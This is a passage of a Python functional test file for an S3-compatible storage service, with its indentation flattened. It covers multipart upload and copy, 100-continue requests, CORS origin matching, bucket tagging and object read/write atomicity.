_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name, version_id=vid)
def _check_upload_multipart_resend(bucket_name, key, objlen, resend_parts):
content_type = 'text/bla'
metadata = {'foo': 'bar'}
client = get_client()
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen, content_type=content_type, metadata=metadata, resend_parts=resend_parts)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=bucket_name, Key=key)
eq(response['ContentType'], content_type)
eq(response['Metadata'], metadata)
body = _get_body(response)
eq(len(body), response['ContentLength'])
eq(body, data)
_check_content_using_range(key, bucket_name, data, 1000000)
_check_content_using_range(key, bucket_name, data, 10000000)
@attr(resource='object')
@attr(method='put')
@attr(operation='complete multi-part upload')
@attr(assertion='successful')
def test_multipart_upload_resend_part():
bucket_name = get_new_bucket()
key="mymultipart"
objlen = 30 * 1024 * 1024
_check_upload_multipart_resend(bucket_name, key, objlen, [0])
_check_upload_multipart_resend(bucket_name, key, objlen, [1])
_check_upload_multipart_resend(bucket_name, key, objlen, [2])
_check_upload_multipart_resend(bucket_name, key, objlen, [1,2])
_check_upload_multipart_resend(bucket_name, key, objlen, [0,1,2,3,4,5])
@attr(resource='object')
@attr(method='put')
@attr(operation='complete multiple multi-part upload with different sizes')
@attr(assertion='successful')
def test_multipart_upload_multiple_sizes():
bucket_name = get_new_bucket()
key="mymultipart"
client = get_client()
objlen = 5*1024*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
objlen = 5*1024*1024+100*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
objlen = 5*1024*1024+600*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
objlen = 10*1024*1024+100*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
objlen = 10*1024*1024+600*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
objlen = 10*1024*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
@attr(resource='object')
@attr(method='put')
@attr(operation='check multipart copies with multiple sizes')
@attr(assertion='successful')
def test_multipart_copy_multiple_sizes():
src_key = 'foo'
src_bucket_name = _create_key_with_random_content(src_key, 12*1024*1024)
dest_bucket_name = get_new_bucket()
dest_key="mymultipart"
client = get_client()
size = 5*1024*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
size = 5*1024*1024+100*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
size = 5*1024*1024+600*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
size = 10*1024*1024+100*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
size = 10*1024*1024+600*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
size = 10*1024*1024
(upload_id, parts) = _multipart_copy(src_bucket_name, src_key, dest_bucket_name, dest_key, size)
client.complete_multipart_upload(Bucket=dest_bucket_name, Key=dest_key, UploadId=upload_id, MultipartUpload={'Parts': parts})
_check_key_content(src_key, src_bucket_name, dest_key, dest_bucket_name)
@attr(resource='object')
@attr(method='put')
@attr(operation='check failure on multiple multi-part upload with size too small')
@attr(assertion='fails 400')
def test_multipart_upload_size_too_small():
bucket_name = get_new_bucket()
key="mymultipart"
client = get_client()
size = 100*1024
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=size, part_size=10*1024)
e = assert_raises(ClientError, client.complete_multipart_upload, Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'EntityTooSmall')
def gen_rand_string(size, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
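# Note for the helper below: gen_rand_string(5)*1024*1024 builds a 5 MiB part by repeating
# a random 5-character string, and the final part is a fixed 3 MiB of '123' repeated.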
def _do_test_multipart_upload_contents(bucket_name, key, num_parts):
payload=gen_rand_string(5)*1024*1024
client = get_client()
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
upload_id = response['UploadId']
parts = []
for part_num in range(0, num_parts):
part = bytes(payload, 'utf-8')
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num+1, Body=part)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': part_num+1})
last_payload = '123'*1024*1024
last_part = bytes(last_payload, 'utf-8')
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=num_parts+1, Body=last_part)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': num_parts+1})
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=bucket_name, Key=key)
test_string = _get_body(response)
all_payload = payload*num_parts + last_payload
assert test_string == all_payload
return all_payload
@attr(resource='object')
@attr(method='put')
@attr(operation='check contents of multi-part upload')
@attr(assertion='successful')
def test_multipart_upload_contents():
bucket_name = get_new_bucket()
_do_test_multipart_upload_contents(bucket_name, 'mymultipart', 3)
@attr(resource='object')
@attr(method='put')
@attr(operation='multi-part upload overwrites existing key')
@attr(assertion='successful')
def test_multipart_upload_overwrite_existing_object():
bucket_name = get_new_bucket()
client = get_client()
key = 'mymultipart'
payload='12345'*1024*1024
num_parts=2
client.put_object(Bucket=bucket_name, Key=key, Body=payload)
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
upload_id = response['UploadId']
parts = []
for part_num in range(0, num_parts):
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num+1, Body=payload)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': part_num+1})
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.get_object(Bucket=bucket_name, Key=key)
test_string = _get_body(response)
assert test_string == payload*num_parts
@attr(resource='object')
@attr(method='put')
@attr(operation='abort multi-part upload')
@attr(assertion='successful')
def test_abort_multipart_upload():
bucket_name = get_new_bucket()
key="mymultipart"
objlen = 10 * 1024 * 1024
client = get_client()
(upload_id, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=objlen)
client.abort_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id)
response = client.head_bucket(Bucket=bucket_name)
rgw_bytes_used = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-bytes-used', 0))
eq(rgw_bytes_used, 0)
rgw_object_count = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-object-count', 0))
eq(rgw_object_count, 0)
@attr(resource='object')
@attr(method='put')
@attr(operation='abort non-existent multi-part upload')
@attr(assertion='fails 404')
def test_abort_multipart_upload_not_found():
bucket_name = get_new_bucket()
client = get_client()
key="mymultipart"
client.put_object(Bucket=bucket_name, Key=key)
e = assert_raises(ClientError, client.abort_multipart_upload, Bucket=bucket_name, Key=key, UploadId='56788')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchUpload')
@attr(resource='object')
@attr(method='put')
@attr(operation='concurrent multi-part uploads')
@attr(assertion='successful')
def test_list_multipart_upload():
bucket_name = get_new_bucket()
client = get_client()
key="mymultipart"
mb = 1024 * 1024
upload_ids = []
(upload_id1, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=5*mb)
upload_ids.append(upload_id1)
(upload_id2, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key, size=6*mb)
upload_ids.append(upload_id2)
key2="mymultipart2"
(upload_id3, data, parts) = _multipart_upload(bucket_name=bucket_name, key=key2, size=5*mb)
upload_ids.append(upload_id3)
response = client.list_multipart_uploads(Bucket=bucket_name)
uploads = response['Uploads']
resp_uploadids = []
for i in range(0, len(uploads)):
resp_uploadids.append(uploads[i]['UploadId'])
for i in range(0, len(upload_ids)):
eq(True, (upload_ids[i] in resp_uploadids))
client.abort_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id1)
client.abort_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id2)
client.abort_multipart_upload(Bucket=bucket_name, Key=key2, UploadId=upload_id3)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list multipart uploads with different owners')
@attr(assertion='successful')
def test_list_multipart_upload_owner():
bucket_name = get_new_bucket()
client1 = get_client()
user1 = get_main_user_id()
name1 = get_main_display_name()
client2 = get_alt_client()
user2 = get_alt_user_id()
name2 = get_alt_display_name()
# add bucket acl for public read/write access
client1.put_bucket_acl(Bucket=bucket_name, ACL='public-read-write')
key1 = 'multipart1'
key2 = 'multipart2'
upload1 = client1.create_multipart_upload(Bucket=bucket_name, Key=key1)['UploadId']
try:
upload2 = client2.create_multipart_upload(Bucket=bucket_name, Key=key2)['UploadId']
try:
# match fields of an Upload from ListMultipartUploadsResult
def match(upload, key, uploadid, userid, username):
eq(upload['Key'], key)
eq(upload['UploadId'], uploadid)
eq(upload['Initiator']['ID'], userid)
eq(upload['Initiator']['DisplayName'], username)
eq(upload['Owner']['ID'], userid)
eq(upload['Owner']['DisplayName'], username)
# list uploads with client1
uploads1 = client1.list_multipart_uploads(Bucket=bucket_name)['Uploads']
eq(len(uploads1), 2)
match(uploads1[0], key1, upload1, user1, name1)
match(uploads1[1], key2, upload2, user2, name2)
# list uploads with client2
uploads2 = client2.list_multipart_uploads(Bucket=bucket_name)['Uploads']
eq(len(uploads2), 2)
match(uploads2[0], key1, upload1, user1, name1)
match(uploads2[1], key2, upload2, user2, name2)
finally:
client2.abort_multipart_upload(Bucket=bucket_name, Key=key2, UploadId=upload2)
finally:
client1.abort_multipart_upload(Bucket=bucket_name, Key=key1, UploadId=upload1)
@attr(resource='object')
@attr(method='put')
@attr(operation='multi-part upload with missing part')
def test_multipart_upload_missing_part():
bucket_name = get_new_bucket()
client = get_client()
key="mymultipart"
size = 1
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
upload_id = response['UploadId']
parts = []
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=1, Body=bytes('\x00', 'utf-8'))
# the part above was uploaded as PartNumber 1; referencing 9999 here should trigger InvalidPart
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': 9999})
e = assert_raises(ClientError, client.complete_multipart_upload, Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidPart')
@attr(resource='object')
@attr(method='put')
@attr(operation='multi-part upload with incorrect ETag')
def test_multipart_upload_incorrect_etag():
bucket_name = get_new_bucket()
client = get_client()
key="mymultipart"
size = 1
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
upload_id = response['UploadId']
parts = []
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=1, Body=bytes('\x00', 'utf-8'))
# the real ETag of the single NUL byte is "93b885adfe0da089cdf634904fd59f71"; a bogus value should trigger InvalidPart
parts.append({'ETag': "ffffffffffffffffffffffffffffffff", 'PartNumber': 1})
e = assert_raises(ClientError, client.complete_multipart_upload, Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidPart')
def _simple_http_req_100_cont(host, port, is_secure, method, resource):
"""
Send the specified request with an 'Expect: 100-continue' header
and return the status code of the first response line.
"""
req_str = '{method} {resource} HTTP/1.1\r\nHost: {host}\r\nAccept-Encoding: identity\r\nContent-Length: 123\r\nExpect: 100-continue\r\n\r\n'.format(
method=method,
resource=resource,
host=host,
)
req = bytes(req_str, 'utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if is_secure:
s = ssl.wrap_socket(s)
s.settimeout(5)
s.connect((host, port))
s.send(req)
try:
data = s.recv(1024)
except socket.error as msg:
print('got response: ', msg)
print('most likely server doesn\'t support 100-continue')
s.close()
data_str = data.decode()
status_line = data_str.split(' ')
assert status_line[0].startswith('HTTP')
return status_line[1]
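# Illustrative handshake: a server that honours 'Expect: 100-continue' answers the bare
# headers with 'HTTP/1.1 100 Continue' before any body is sent, so this helper returns
# '100'; a server that rejects the request outright returns a final status such as '403'.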
@attr(resource='object')
@attr(method='put')
@attr(operation='w/expect continue')
@attr(assertion='succeeds if object is public-read-write')
@attr('100_continue')
@attr('fails_on_mod_proxy_fcgi')
def test_100_continue():
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(Bucket=bucket_name)
objname='testobj'
resource = '/{bucket}/{obj}'.format(bucket=bucket_name, obj=objname)
host = get_config_host()
port = get_config_port()
is_secure = get_config_is_secure()
# NOTE: this test still needs to be verified with is_secure set to True
status = _simple_http_req_100_cont(host, port, is_secure, 'PUT', resource)
eq(status, '403')
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read-write')
status = _simple_http_req_100_cont(host, port, is_secure, 'PUT', resource)
eq(status, '100')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set cors')
@attr(assertion='succeeds')
@attr('cors')
def test_set_cors():
bucket_name = get_new_bucket()
client = get_client()
allowed_methods = ['GET', 'PUT']
allowed_origins = ['*.get', '*.put']
cors_config ={
'CORSRules': [
{'AllowedMethods': allowed_methods,
'AllowedOrigins': allowed_origins,
},
]
}
e = assert_raises(ClientError, client.get_bucket_cors, Bucket=bucket_name)
status = _get_status(e.response)
eq(status, 404)
client.put_bucket_cors(Bucket=bucket_name, CORSConfiguration=cors_config)
response = client.get_bucket_cors(Bucket=bucket_name)
eq(response['CORSRules'][0]['AllowedMethods'], allowed_methods)
eq(response['CORSRules'][0]['AllowedOrigins'], allowed_origins)
client.delete_bucket_cors(Bucket=bucket_name)
e = assert_raises(ClientError, client.get_bucket_cors, Bucket=bucket_name)
status = _get_status(e.response)
eq(status, 404)
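# Helper for the CORS tests below: issue a plain HTTP(S) request against the bucket URL and
# check the status code plus the Access-Control-Allow-Origin / Access-Control-Allow-Methods
# response headers (an expectation of None means the header must be absent).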
def _cors_request_and_check(func, url, headers, expect_status, expect_allow_origin, expect_allow_methods):
r = func(url, headers=headers, verify=get_config_ssl_verify())
eq(r.status_code, expect_status)
assert r.headers.get('access-control-allow-origin', None) == expect_allow_origin
assert r.headers.get('access-control-allow-methods', None) == expect_allow_methods
@attr(resource='bucket')
@attr(method='get')
@attr(operation='check cors response when origin header set')
@attr(assertion='returning cors header')
@attr('cors')
def test_cors_origin_response():
bucket_name = _setup_bucket_acl(bucket_acl='public-read')
client = get_client()
cors_config ={
'CORSRules': [
{'AllowedMethods': ['GET'],
'AllowedOrigins': ['*suffix'],
},
{'AllowedMethods': ['GET'],
'AllowedOrigins': ['start*end'],
},
{'AllowedMethods': ['GET'],
'AllowedOrigins': ['prefix*'],
},
{'AllowedMethods': ['PUT'],
'AllowedOrigins': ['*.put'],
}
]
}
e = assert_raises(ClientError, client.get_bucket_cors, Bucket=bucket_name)
status = _get_status(e.response)
eq(status, 404)
client.put_bucket_cors(Bucket=bucket_name, CORSConfiguration=cors_config)
time.sleep(3)
url = _get_post_url(bucket_name)
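# The CORS rules above treat '*' as a wildcard: '*suffix' matches any origin ending in
# 'suffix', 'start*end' matches 'start' + anything + 'end', and 'prefix*' matches any
# origin starting with 'prefix'; the checks below cover matching and non-matching origins
# for both simple GETs and OPTIONS preflight requests.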
_cors_request_and_check(requests.get, url, None, 200, None, None)
_cors_request_and_check(requests.get, url, {'Origin': 'foo.suffix'}, 200, 'foo.suffix', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': 'foo.bar'}, 200, None, None)
_cors_request_and_check(requests.get, url, {'Origin': 'foo.suffix.get'}, 200, None, None)
_cors_request_and_check(requests.get, url, {'Origin': 'startend'}, 200, 'startend', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': 'start1end'}, 200, 'start1end', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': 'start12end'}, 200, 'start12end', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': '0start12end'}, 200, None, None)
_cors_request_and_check(requests.get, url, {'Origin': 'prefix'}, 200, 'prefix', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': 'prefix.suffix'}, 200, 'prefix.suffix', 'GET')
_cors_request_and_check(requests.get, url, {'Origin': 'bla.prefix'}, 200, None, None)
obj_url = '{u}/{o}'.format(u=url, o='bar')
_cors_request_and_check(requests.get, obj_url, {'Origin': 'foo.suffix'}, 404, 'foo.suffix', 'GET')
_cors_request_and_check(requests.put, obj_url, {'Origin': 'foo.suffix', 'Access-Control-Request-Method': 'GET',
'content-length': '0'}, 403, 'foo.suffix', 'GET')
_cors_request_and_check(requests.put, obj_url, {'Origin': 'foo.suffix', 'Access-Control-Request-Method': 'PUT',
'content-length': '0'}, 403, None, None)
_cors_request_and_check(requests.put, obj_url, {'Origin': 'foo.suffix', 'Access-Control-Request-Method': 'DELETE',
'content-length': '0'}, 403, None, None)
_cors_request_and_check(requests.put, obj_url, {'Origin': 'foo.suffix', 'content-length': '0'}, 403, None, None)
_cors_request_and_check(requests.put, obj_url, {'Origin': 'foo.put', 'content-length': '0'}, 403, 'foo.put', 'PUT')
_cors_request_and_check(requests.get, obj_url, {'Origin': 'foo.suffix'}, 404, 'foo.suffix', 'GET')
_cors_request_and_check(requests.options, url, None, 400, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'foo.suffix'}, 400, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'bla'}, 400, None, None)
_cors_request_and_check(requests.options, obj_url, {'Origin': 'foo.suffix', 'Access-Control-Request-Method': 'GET',
'content-length': '0'}, 200, 'foo.suffix', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': 'foo.bar', 'Access-Control-Request-Method': 'GET'}, 403, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'foo.suffix.get', 'Access-Control-Request-Method': 'GET'}, 403, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'startend', 'Access-Control-Request-Method': 'GET'}, 200, 'startend', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': 'start1end', 'Access-Control-Request-Method': 'GET'}, 200, 'start1end', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': 'start12end', 'Access-Control-Request-Method': 'GET'}, 200, 'start12end', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': '0start12end', 'Access-Control-Request-Method': 'GET'}, 403, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'prefix', 'Access-Control-Request-Method': 'GET'}, 200, 'prefix', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': 'prefix.suffix', 'Access-Control-Request-Method': 'GET'}, 200, 'prefix.suffix', 'GET')
_cors_request_and_check(requests.options, url, {'Origin': 'bla.prefix', 'Access-Control-Request-Method': 'GET'}, 403, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'foo.put', 'Access-Control-Request-Method': 'GET'}, 403, None, None)
_cors_request_and_check(requests.options, url, {'Origin': 'foo.put', 'Access-Control-Request-Method': 'PUT'}, 200, 'foo.put', 'PUT')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='check cors response when origin is set to wildcard')
@attr(assertion='returning cors header')
@attr('cors')
def test_cors_origin_wildcard():
bucket_name = _setup_bucket_acl(bucket_acl='public-read')
client = get_client()
cors_config ={
'CORSRules': [
{'AllowedMethods': ['GET'],
'AllowedOrigins': ['*'],
},
]
}
e = assert_raises(ClientError, client.get_bucket_cors, Bucket=bucket_name)
status = _get_status(e.response)
eq(status, 404)
client.put_bucket_cors(Bucket=bucket_name, CORSConfiguration=cors_config)
time.sleep(3)
url = _get_post_url(bucket_name)
_cors_request_and_check(requests.get, url, None, 200, None, None)
_cors_request_and_check(requests.get, url, {'Origin': 'example.origin'}, 200, '*', 'GET')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='check cors response when Access-Control-Request-Headers is set in option request')
@attr(assertion='returning cors header')
@attr('cors')
def test_cors_header_option():
bucket_name = _setup_bucket_acl(bucket_acl='public-read')
client = get_client()
cors_config ={
'CORSRules': [
{'AllowedMethods': ['GET'],
'AllowedOrigins': ['*'],
'ExposeHeaders': ['x-amz-meta-header1'],
},
]
}
e = assert_raises(ClientError, client.get_bucket_cors, Bucket=bucket_name)
status = _get_status(e.response)
eq(status, 404)
client.put_bucket_cors(Bucket=bucket_name, CORSConfiguration=cors_config)
time.sleep(3)
url = _get_post_url(bucket_name)
obj_url = '{u}/{o}'.format(u=url, o='bar')
_cors_request_and_check(requests.options, obj_url, {'Origin': 'example.origin','Access-Control-Request-Headers':'x-amz-meta-header2','Access-Control-Request-Method':'GET'}, 403, None, None)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='put tags')
@attr(assertion='succeeds')
@attr('tagging')
def test_set_bucket_tagging():
bucket_name = get_new_bucket()
client = get_client()
tags={
'TagSet': [
{
'Key': 'Hello',
'Value': 'World'
},
]
}
e = assert_raises(ClientError, client.get_bucket_tagging, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchTagSetError')
client.put_bucket_tagging(Bucket=bucket_name, Tagging=tags)
response = client.get_bucket_tagging(Bucket=bucket_name)
eq(len(response['TagSet']), 1)
eq(response['TagSet'][0]['Key'], 'Hello')
eq(response['TagSet'][0]['Value'], 'World')
client.delete_bucket_tagging(Bucket=bucket_name)
e = assert_raises(ClientError, client.get_bucket_tagging, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchTagSetError')
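# The Fake*File classes below emulate just enough of the file protocol (read/write/seek/tell)
# for boto3 uploads and downloads, and can fire an interrupt callback mid-transfer; the
# atomicity tests use that hook to overwrite or delete the object while a transfer is in
# flight.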
class FakeFile(object):
"""
file-like object that simulates seek and tell for a stream of a single repeated character
"""
def __init__(self, char='A', interrupt=None):
self.offset = 0
self.char = bytes(char, 'utf-8')
self.interrupt = interrupt
def seek(self, offset, whence=os.SEEK_SET):
if whence == os.SEEK_SET:
self.offset = offset
elif whence == os.SEEK_END:
self.offset = self.size + offset
elif whence == os.SEEK_CUR:
self.offset += offset
def tell(self):
return self.offset
class FakeWriteFile(FakeFile):
"""
file-like object that simulates interruptible reads of constant data
"""
def __init__(self, size, char='A', interrupt=None):
FakeFile.__init__(self, char, interrupt)
self.size = size
def read(self, size=-1):
if size < 0:
size = self.size - self.offset
count = min(size, self.size - self.offset)
self.offset += count
# Sneaky! invoke the interrupt callback just before the final read returns
if self.interrupt is not None and self.offset == self.size and count > 0:
self.interrupt()
return self.char*count
class FakeReadFile(FakeFile):
"""
file-like object that simulates writes, firing the interrupt callback once data has started arriving
"""
def __init__(self, size, char='A', interrupt=None):
FakeFile.__init__(self, char, interrupt)
self.interrupted = False
self.size = 0
self.expected_size = size
def write(self, chars):
eq(chars, self.char*len(chars))
self.offset += len(chars)
self.size += len(chars)
# Sneaky! fire the interrupt callback only once, after data has started being written
if not self.interrupted and self.interrupt is not None \
and self.offset > 0:
self.interrupt()
self.interrupted = True
def close(self):
eq(self.size, self.expected_size)
class FakeFileVerifier(object):
"""
file that verifies expected data has been written
"""
def __init__(self, char=None):
self.char = char
self.size = 0
def write(self, data):
size = len(data)
if self.char is None:
self.char = data.decode()[0]
self.size += size
eq(data.decode(), self.char*size)
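# FakeFileVerifier is handed to client.download_fileobj() below, which calls write()
# repeatedly; if no expected character was given, the first character of the first chunk
# becomes the expectation, and every chunk must consist solely of that character.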
def _verify_atomic_key_data(bucket_name, key, size=-1, char=None):
"""
Make sure file is of the expected size and (simulated) content
"""
fp_verify = FakeFileVerifier(char)
client = get_client()
client.download_fileobj(bucket_name, key, fp_verify)
if size >= 0:
eq(fp_verify.size, size)
def _test_atomic_read(file_size):
"""
Upload an object consisting of A's.
While reading it back, overwrite the object with B's.
Then re-read the contents and confirm we get B's.
"""
bucket_name = get_new_bucket()
client = get_client()
fp_a = FakeWriteFile(file_size, 'A')
client.put_object(Bucket=bucket_name, Key='testobj', Body=fp_a)
fp_b = FakeWriteFile(file_size, 'B')
fp_a2 = FakeReadFile(file_size, 'A',
lambda: client.put_object(Bucket=bucket_name, Key='testobj', Body=fp_b)
)
read_client = get_client()
read_client.download_fileobj(bucket_name, 'testobj', fp_a2)
fp_a2.close()
_verify_atomic_key_data(bucket_name, 'testobj', file_size, 'B')
@attr(resource='object')
@attr(method='put')
@attr(operation='read atomicity')
@attr(assertion='1MB successful')
def test_atomic_read_1mb():
_test_atomic_read(1024*1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='read atomicity')
@attr(assertion='4MB successful')
def test_atomic_read_4mb():
_test_atomic_read(1024*1024*4)
@attr(resource='object')
@attr(method='put')
@attr(operation='read atomicity')
@attr(assertion='8MB successful')
def test_atomic_read_8mb():
_test_atomic_read(1024*1024*8)
def _test_atomic_write(file_size):
"""
Upload an object consisting of A's and verify the contents are all A's.
Then overwrite it with B's, but while that upload is still in progress
verify the stored contents are still all A's.
Finally re-read the contents and confirm we get B's.
"""
bucket_name = get_new_bucket()
client = get_client()
objname = 'testobj'
# create <file_size> file of A's
fp_a = FakeWriteFile(file_size, 'A')
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_a)
# verify A's
_verify_atomic_key_data(bucket_name, objname, file_size, 'A')
# create <file_size> file of B's
# but try to verify the file before we finish writing all the B's
fp_b = FakeWriteFile(file_size, 'B',
lambda: _verify_atomic_key_data(bucket_name, objname, file_size, 'A')
)
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_b)
# verify B's
_verify_atomic_key_data(bucket_name, objname, file_size, 'B')
@attr(resource='object')
@attr(method='put')
@attr(operation='write atomicity')
@attr(assertion='1MB successful')
def test_atomic_write_1mb():
_test_atomic_write(1024*1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='write atomicity')
@attr(assertion='4MB successful')
def test_atomic_write_4mb():
_test_atomic_write(1024*1024*4)
@attr(resource='object')
@attr(method='put')
@attr(operation='write atomicity')
@attr(assertion='8MB successful')
def test_atomic_write_8mb():
_test_atomic_write(1024*1024*8)
def _test_atomic_dual_write(file_size):
"""
Create an object, then have two overlapping uploads write different contents;
confirm the final object is entirely one or the other.
"""
bucket_name = get_new_bucket()
objname = 'testobj'
client = get_client()
client.put_object(Bucket=bucket_name, Key=objname)
# write <file_size> file of B's
# but before we're done, try to write all A's
fp_a = FakeWriteFile(file_size, 'A')
def rewind_put_fp_a():
fp_a.seek(0)
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_a)
fp_b = FakeWriteFile(file_size, 'B', rewind_put_fp_a)
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_b)
# verify the file
_verify_atomic_key_data(bucket_name, objname, file_size, 'B')
@attr(resource='object')
@attr(method='put')
@attr(operation='write one or the other')
@attr(assertion='1MB successful')
def test_atomic_dual_write_1mb():
_test_atomic_dual_write(1024*1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='write one or the other')
@attr(assertion='4MB successful')
def test_atomic_dual_write_4mb():
_test_atomic_dual_write(1024*1024*4)
@attr(resource='object')
@attr(method='put')
@attr(operation='write one or the other')
@attr(assertion='8MB successful')
def test_atomic_dual_write_8mb():
_test_atomic_dual_write(1024*1024*8)
def _test_atomic_conditional_write(file_size):
"""
Create a file of A's, use it to set_contents_from_file.
Verify the contents are all A's.
Create a file of B's, use it to re-set_contents_from_file.
Before re-set continues, verify content's still A's
Re-read the contents, and confirm we get B's
"""
bucket_name = get_new_bucket()
objname = 'testobj'
client = get_client()
# create <file_size> file of A's
fp_a = FakeWriteFile(file_size, 'A')
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_a)
fp_b = FakeWriteFile(file_size, 'B',
lambda: _verify_atomic_key_data(bucket_name, objname, file_size, 'A')
)
# create <file_size> file of B's
# but try to verify the file before we finish writing all the B's
